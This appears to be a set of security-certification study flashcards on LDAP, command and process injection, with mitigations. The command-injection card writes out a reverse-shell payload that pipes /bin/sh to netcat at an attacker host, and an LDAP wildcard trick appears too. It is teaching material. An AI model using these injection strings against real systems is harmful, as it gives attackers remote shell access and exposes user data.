Section 19.185 Injection Attacks Flashcards
Objective 2.4 Given a scenario, you must be able to analyse indicators of malicious activity
Lightweight Directory Access Protocol (LDAP)
An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network
often used for authentication and storing information about users groups and applications
LDAP Injection
An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input
■ Use input validation and input sanitization as protection against an LDAP injection attack
Example: If a web application uses LDAP as part of the user login process, an attacker could perform an LDAP injection to search for the users on that server by injecting queries into the LDAP search,
similar to how an attacker inserts malicious queries into an SQL injection. For example, if the backend code for the server use the following code, string ldapSearch = “(cn = $searchName”)”;
System.out.println(ldapSearch); this could actually allow an attacker to simply enter a wildcard character of star into the username field
and that would then be inserted as the search parameter and display all of your users on the system to your screen.
Command Injection
Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application
For example, if you have a web application
that allows a user to test a connectivity with a remote website or server by simply entering in the IP address or host name, and then on the backend you’re going to use the ping command, this could be subject to a command injection by simply appending a command to the app. For example, your application in this website might have a form that’s going to allow you to enter an IP address
and the web application then takes that input
and adds it to the ping command to execute it on your server. So if I enter diontraining.com and hit the button, it’s going to send that over and become ping diontraining.com. But if instead, I decide to enter diontraining.com && hostname into that field, this will create a command of ping diontraining.com && hostname that’s going to be executed by the server shell. This would then return the result of the ping command and then display the host name of that server. If I wanted to make this a little bit more malicious, I can instead use something like, diontraining.com && /bin/sh
l nc hacked.diontraining.com 443. This would then ping diontraining.com and then move to the second command, which is starting up a shell and redirecting it over to netcat to a listener that I have set up hackdiontraining.com over port 443.
This would essentially give me full interactive access to this web server by running the simple command injection against that vulnerable server.
Process Injection
Method of executing arbitrary code in the address space of a separate live
process
■ There are many different ways to inject code into a process:
● Injection through DLLs
● Thread Execution Hijacking
● Process Hollowing
● Process Doppel Ganging
● Asynchronous Procedure Calls
● Portable Executable Injections
■ Mitigation includes:
● Endpoint security solutions that are configured to block common sequences of attack behavior
● Security Kernel Modules
● Practice of Least Privilege
